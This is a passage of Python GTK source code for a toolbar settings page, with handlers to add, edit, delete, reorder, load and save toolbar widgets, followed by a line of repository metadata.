self._combobox_icon_size.add_attribute(renderer, 'text', 0)
self._combobox_icon_size.connect('changed', self._parent.enable_save)
style_box = Gtk.HBox(False, 5)
style_box.pack_start(label_style, False, False, 0)
style_box.pack_start(self._combobox_styles, False, False, 0)
size_box = Gtk.HBox(False, 5)
size_box.pack_start(label_icon_size, False, False, 0)
size_box.pack_start(self._combobox_icon_size, False, False, 0)
self.pack_start(style_box, False, False, 0)
self.pack_start(size_box, False, False, 0)
self.pack_start(container, True, True, 0)
self.pack_start(button_box, False, False, 0)
def _add_widget(self, widget, data=None):
"""Show dialog for creating toolbar widget"""
widget_added = self._toolbar_manager.show_create_widget_dialog(self._parent)
if widget_added:
self._add_item_to_list(widget_added)
# enable save button
self._parent.enable_save()
def _delete_widget(self, widget, data=None):
"""Delete selected toolbar widget"""
selection = self._list.get_selection()
list_, iter_ = selection.get_selected()
if iter_ is not None:
# remove item from list
list_.remove(iter_)
# enable save button if item was removed
self._parent.enable_save()
def _edited_name(self, cell, path, text, column):
"""Record edited text"""
selected_iter = self._store.get_iter(path)
if selected_iter is not None:
self._store.set_value(selected_iter, column, text)
# enable save button
self._parent.enable_save()
def _edit_widget(self, widget, data=None):
"""Edit selected toolbar widget"""
selection = self._list.get_selection()
list_, iter_ = selection.get_selected()
if iter_ is not None:
name = list_.get_value(iter_, Column.NAME)
widget_type = list_.get_value(iter_, Column.TYPE)
widget_config = list_.get_value(iter_, Column.CONFIG)
edited = self._toolbar_manager.show_configure_widget_dialog(
name,
widget_type,
json.loads(widget_config),
self._parent
)
# enable save button
if edited:
self._store.set_value(iter_, Column.CONFIG, json.dumps(edited))
self._parent.enable_save()
	def _move_widget(self, widget, direction):
		"""Move the selected widget up or down, depending on direction"""
selection = self._list.get_selection()
list_, iter_ = selection.get_selected()
if iter_ is not None:
# get iter index
index = list_.get_path(iter_)[0]
# depending on direction, swap iters
if (direction == -1 and index > 0) \
or (direction == 1 and index < len(list_) - 1):
list_.swap(iter_, list_[index + direction].iter)
# enable save button if iters were swapped
self._parent.enable_save()
def _add_item_to_list(self, item):
name = item['name']
widget_type = item['type']
widget_config = item['config'] if 'config' in item else {}
data = self._toolbar_manager.get_widget_data(widget_type)
if data is not None:
icon = data[1]
description = data[0]
else: # failsafe, display raw widget type
icon = ''
description = '{0} <small><i>({1})</i></small>'.format(widget_type, _('missing plugin'))
self._store.append((name, description, widget_type, icon, json.dumps(widget_config)))
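	# Item dicts handled above and in _load_options look roughly like
	# {'name': 'Home', 'type': 'bookmark_button', 'config': {...}} (a sketch; the
	# available widget type names depend on the installed toolbar plugins).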
def _load_options(self):
"""Load options from file"""
options = self._application.toolbar_options
self._combobox_styles.set_active(options.get('style'))
self._combobox_icon_size.set_active(options.get('icon_size'))
# clear list store
self._store.clear()
for item in options.get('items'):
self._add_item_to_list(item)
def _save_options(self):
"""Save settings to config file"""
options = self._application.toolbar_options
options.set('style', self._combobox_styles.get_active())
options.set('icon_size', self._combobox_icon_size.get_active())
# save toolbar items settings
items = []
for data in self._store:
items.append({
'name': data[Column.NAME],
'type': data[Column.TYPE],
'config': json.loads(data[Column.CONFIG]),
})
options.set('items', items)
| gpl-3.0 | -8,279,819,229,029,512,000 | 30.470588 | 91 | 0.694704 | false |